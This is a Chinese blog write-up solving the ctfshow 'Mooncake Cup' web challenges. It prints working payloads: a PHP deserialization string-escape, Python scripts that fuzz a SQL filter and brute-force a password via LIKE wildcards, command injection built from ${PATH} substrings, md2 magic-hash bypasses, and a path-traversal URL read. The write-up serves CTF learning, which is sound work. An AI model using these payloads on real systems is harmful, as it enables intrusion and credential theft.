ctfshow-月饼杯

最新推荐文章于 2024-06-24 18:14:21 发布
最新推荐文章于 2024-06-24 18:14:21 发布
阅读量684 收藏 9
点赞数 21
文章标签: 网络安全 python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75812594/article/details/138416145
版权

web1_此夜圆

下载源码:

<?php
error_reporting(0);

class a
{
	public $uname;
	public $password;
	public function __construct($uname,$password)
	{
		$this->uname=$uname;
		$this->password=$password;
	}
	public function __wakeup()
	{
			if($this->password==='yu22x')
			{
				include('flag.php');
				echo $flag;	
			}
			else
			{
				echo 'wrong password';
			}
		}
	}

function filter($string){
    return str_replace('Firebasky','Firebaskyup',$string);
}

$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>

 读源码可知,我们需要反序列将password的值赋为‘yu22x’。

O:1:"a":2:{s:5:"uname";s:4:"xxxx";s:8:"password";s:5:"yu22x";}

但是无果,因为password已被定义,无法修改。但由于filter函数的存在,它会将'Firebasky'字符串替换为'Firebaskyup' ,将长度增加了2个字符。那我们可以通过字符串逃逸即逃逸出另一个我们想要的字符。

s:8:"password";s:5:"yu22x"
由于要达到闭合的效果,为了方便,详细的为:
";s:8:"password";s:5:"yu22x";}

str_len('";s:8:"password";s:5:"yu22x";}')=30

 所以我们需要吐出30字符,即15个Firebasky。

playload:

?1=FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}

web3_莫负婵娟

level1:

网页源码得知用户名和相关的sql查询语句:

<!-- username yu22x -->
<!-- SELECT * FROM users where username like binary('$username') and password like binary('$password')-->

 通过fuzz测试得到过滤字符:

import requests

sql_char = ['select', 'information_schema', 'table_name', 'table_schema', 'tables', 'column', 'union', 'and',
            'or', 'sleep', 'where', 'from', 'limit', 'group', 'by', 'like', 'prepare', 'as', 'if', 'char',
            'ascii', 'ord', 'mid', 'substr', 'length', 'left', 'right', 'substring', 'handler', 'updatexml',
            'extractvalue', 'benchmark', 'insert', 'update', 'all', '@', '#', '^', '&', '|', '*', '\'', '"',
            '~', '`', '(', ')', '{', '--', '=', '<', '>', '!', '/', '\\', ' ', '+', '_', '%']
chars = []
fei = []
for char in sql_char:
    data = {
        'username': char,
        'password': ''
    }
    url = 'https://1361929e-e581-48c9-8a34-9e862648d749.challenge.ctf.show/login.php'
    res = requests.post(url, data=data)
    if 'hack' in res.text:
        print("非法字符: {0}".format(char))
        fei.append(char)
    else:
        chars.append(char)
print("非法字符集: {0}".format(fei))
print("通过: {0}".format(chars))

非法字符集: ['select', 'union', 'sleep', '#', '^', "'", '"', '(', '--', '\\', '%']
通过: ['information_schema', 'table_name', 'table_schema', 'tables', 'column', 'and', 'or', 'where', 'from', 'limit', 'group', 'by', 'like', 'prepare', 'as', 'if', 'char', 'ascii', 'ord', 'mid', 'substr', 'length', 'left', 'right', 'substring', 'handler', 'updatexml', 'extractvalue', 'benchmark', 'insert', 'update', 'all', '@', '&', '|', '*', '~', '`', ')', '{', '=', '<', '>', '!', '/', ' ', '+', '_']

 过滤挺多的。回头看sql语句,是用like来进行模糊匹配,即可以用通配符的方式来查询,即

'%'匹配所有字符,'_'匹配单个字符。

 有fuzz测试得知,%是被过滤的,即只能使用"_"来进行单个字符的匹配。

通过控制"_"的长度可以得知密码的长度为32位:

import requests

url = 'https://ee58a2ee-f1bf-4eaa-a3da-222f1f92497e.challenge.ctf.show/login.php'
p, i = '_', 1
while True:
    r = requests.post(url, data={'username': 'yu22x', 'password': p}).text
    print((r, i))
    i += 1
    p += '_'

('<div align="center">wrong username or password</div>', 28)
('<div align="center">wrong username or password</div>', 29)
('<div align="center">wrong username or password</div>', 30)
('<div align="center">wrong username or password</div>', 31)
('<div align="center">I have filtered all the characters. Why can you come in? get out!</div>', 32)
('<div align="center">wrong username or password</div>', 33)
('<div align="center">wrong username or password</div>', 34)
('<div align="center">wrong username or password</div>', 35)

密码爆破脚本:

import requests
url = 'https://1361929e-e581-48c9-8a34-9e862648d749.challenge.ctf.show/login.php'
passwd = ''
chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
for i in range(32):
    for char in chars:
        data = {
            'username': 'yu22x',
            'password': passwd + char + (31 - i) * '_'
        }
        r = requests.post(url, data=data).text
        if 'wrong' not in r:
            passwd += char
            print(passwd)
            break
# 不建议,速度慢
import requests
url = 'https://1361929e-e581-48c9-8a34-9e862648d749.challenge.ctf.show/login.php'
passwd = ''
for i in range(32):
    for j in range(32, 127):
        # chr(95)=='_'
        if j == 95: 
            continue
        char = chr(j)
        data = {
            'username': 'yu22x',
            'password': passwd + char + (31 - i) * '_'
        }
        r = requests.post(url, data=data).text
        if 'wrong' not in r and 'hack' not in r:
            passwd += char
            print(passwd)
            break
password:67815b0c009ee970fe4014abaa3Fa6A0

level2:

同命名注入。

通过常规的手法:
127.0.0.1;ls
127.77||ls
127.0.0.1&&ls
均回显:
evil input

结合提示:

环境变量 +linux字符串截取 + 通配符

 

 实验可行。

127.0.0.1;${PATH:5:1}${PATH:2:1} //127.0.0.1;ls

P1099.php flag.php index.php login.php style.css style2.css 

127.0.0.1;${PATH:14:1}${PATH:5:1} ???????? //127.0.0.1;nl ???????? -> flag.php

 查看网页源码得到flag

web2_故人心

level1:

if(is_numeric($a) and strlen($a)<7 and $a!=0 and $a**2==0)
<?php
for($i=14;$i<=999;$i++){
	$a='1e-';
	$a=$a."$i";
	if($a!=0 && $a**2==0 && is_numeric($a)){
		echo $a."\n";
	}
}
?>

 经测试如下范围可行:

1e-162~1e-323

level2:

$d = ($b==hash("md2", $b)) && ($c==hash("md2",hash("md2", $c)));

在robots.txt中得到提示,在更具是弱比较,即,我们只需要满足“0e”开头即可。

<?php
$i=1;
while(1){
	$b='0e'.$i.'024452';
	if(hash('md2',$b)==$b){
		echo $b."\n";
		break;
	}
	$i++;
}
$j=1;
while(1){
	$c='0e'.$j.'48399';
	if(hash("md2",hash("md2",$c))==$c){
		echo $c;
		break;
	}
	$j++;
}	
?>

level3:

if(filter_var($url[1],FILTER_VALIDATE_URL)){
                $host=parse_url($url[1]);
                print_r($host); 
                if(preg_match('/ctfshow\.com$/',$host['host'])){
                    print_r(file_get_contents($url[1]));
                }else{
                    echo '差点点就成功了!';
                }
            }else{
                echo 'please give me url!!!';
            }

这段代码的逻辑是检查 $url[1] 是否是以 "ctfshow.com" 结尾的 URL,如果是,则获取该 URL 对应的网页内容;如果不是,则输出提示信息。

当php遇到不认识的协议就会当目录处理,在结合file_get_contents()读取文件内容即可获取flag
url=i-dont-konw://ctfshow.com/../../../../../fl0g.txt

心故
关注
  • 21
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CTF中常见注入题源码及脚本分析
weixin_30659829的博客
07-30 493
1.代码审计发现 这里没有用escape_string,因此存在注入。 1 function show($username){ 2 global $conn; 3 $sql = "select role from `user` where username ='".$username."'"; 4 $res = $conn ->query($sql); ...
ctfshow-月饼WP
~airrudder~
09-27 4363
源码文件Baby(Don't)Cry.py: # -*- coding:utf-8 -*- #Author: Lazzaro from itertools import * from random import * from string import * def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill(2) return
CTFshow月饼(第二届) 中秋快乐 部分wp
Nancy523的博客
09-21 2354
苟,都可以苟 只要我osint做的够快我就不会被刷掉.jpg 体验很好,下次还来( 目录 1、web web签到 直接贴脚本吧,web不太懂不解释 <?php $str="0e"; for($i=1;$i<=10000000000;$i++){ $md5 = $str.$i; if (hash("md5",$md5)==$md5){ echo $md5; break; ..
ctfshow web 月饼II
2301_81040377的博客
05-28 559
但是前面提到了会进行转义,这里是使用了一个%99,解码是个中文可以绕过。这道题命令执行很简单,但是没有生成flag,我们要先生成flag才可以。版本为5.0.2我们可以利用5.1的文件删除漏洞。check之后光速退出,就可以看到这个页面。,然后我们就可以进行反序列化然后进行传参。还有一个base64解码看看。我愿意称为MVP结算页面。
ctfshow web 月饼
m0_62422842的博客
06-10 488
刷题知识总结:php反序列化字符逃逸。php浮点数绕过。hash爆破。file_get_contents读取任意文件。like盲注,脚本编写。通过环境变量截取字符。
[ctf.show.reverse] 月饼II 逆向辣鸡工程师的工作
weixin_52640415的博客
04-28 309
从文件中追踪流得到elf文件,RC4加密,得到一个fake __int64 __fastcall sub_1360(__int64 a1, _BYTE *a2, __int64 a3) { _BYTE *v3; // r10 unsigned int v4; // er9 unsigned int v5; // er8 char *v6; // rax char v7; // dl char *v8; // rcx __int64 result; // rax if (
PWN-PRACTICE-CTFSHOW-8
P1umH0的博客
01-18 1840
PWN-PRACTICE-CTFSHOW-8吃瓜-wuqian月饼II-简单的胖月饼II-容易的胖击剑-pwn01-My_sword_is_ready 吃瓜-wuqian 栈溢出,ret2text # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28059) elf=ELF("./pwn1") sy
ctfshow 月饼(第二届) 部分WriteUp
mumuzi的博客
09-21 2698
Misc 杂项签到 右键附件,从链接另存文件。然后用16进制编辑器或者你想用notepad也彳亍看文件尾,有一串base64,解码即可。 ctfshow{we1come_to_mooncake_cap} 有手就行 查看exif,有一串阿拉伯语,翻译过来是“你知道汉明码吗” 查看图片文件尾,发现一串数字 10110110111 然后随便找一篇看一下是怎么编码的,以及如何纠错的 https://blog.csdn.net/qq_19782019/article/details/87452394 例子他举的也
2021ctfshow月饼web
weixin_47813861的博客
09-22 1237
随便写写,欢迎师傅的意见与批评 eztp <?php namespace app\index\controller; class Index { public function index($run=[]) { highlight_file(__FILE__); echo '<h1>Welcome to CTFSHOW</h1></br>'; echo 'Powered by PHPthink5.
饼来饼往--月饼的会计和税务问题.pdf
02-22
饼来饼往--月饼的会计和税务问题.pdf
小游戏-吃月饼源码
03-19
微信小游戏-吃月饼 源码
小游戏源码-月饼大战.rar
09-16
小游戏源码-月饼大战.rar
饼来饼往--月饼的会计和税务问题.doc
01-27
饼来饼往--月饼的会计和税务问题.doc
微信HTML5在线朋友圈游戏源码带安装部署教程-月饼大战.zip
06-24
微信HTML5在线朋友圈游戏源码带安装部署教程-月饼大战.zip
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8297
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
pytorch库 03 基础知识
最新发布
weixin_42830015的博客
06-24 472
pytorch库 03 基础知识
Windows系统上更换pip源的详细指南
2402_85758349的博客
06-21 426
Python的包管理工具pip允许用户从Python包索引(PyPI)下载和安装第三方库。然而,默认的PyPI源有时可能因为网络问题或地理位置导致访问速度较慢。更换为更快的源可以显著提高下载和安装Python包的速度。本文将详细介绍如何在Windows系统上更换pip的源。
月饼词云python
09-16
月饼词云的制作涉及到Python中的数据分析和可视化技术。您可以使用Python的数据分析库(如pandas)和可视化库(如matplotlib或WordCloud)来处理和展示月饼的数据。您可以按照以下步骤进行操作: 1. 导入所需的库,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值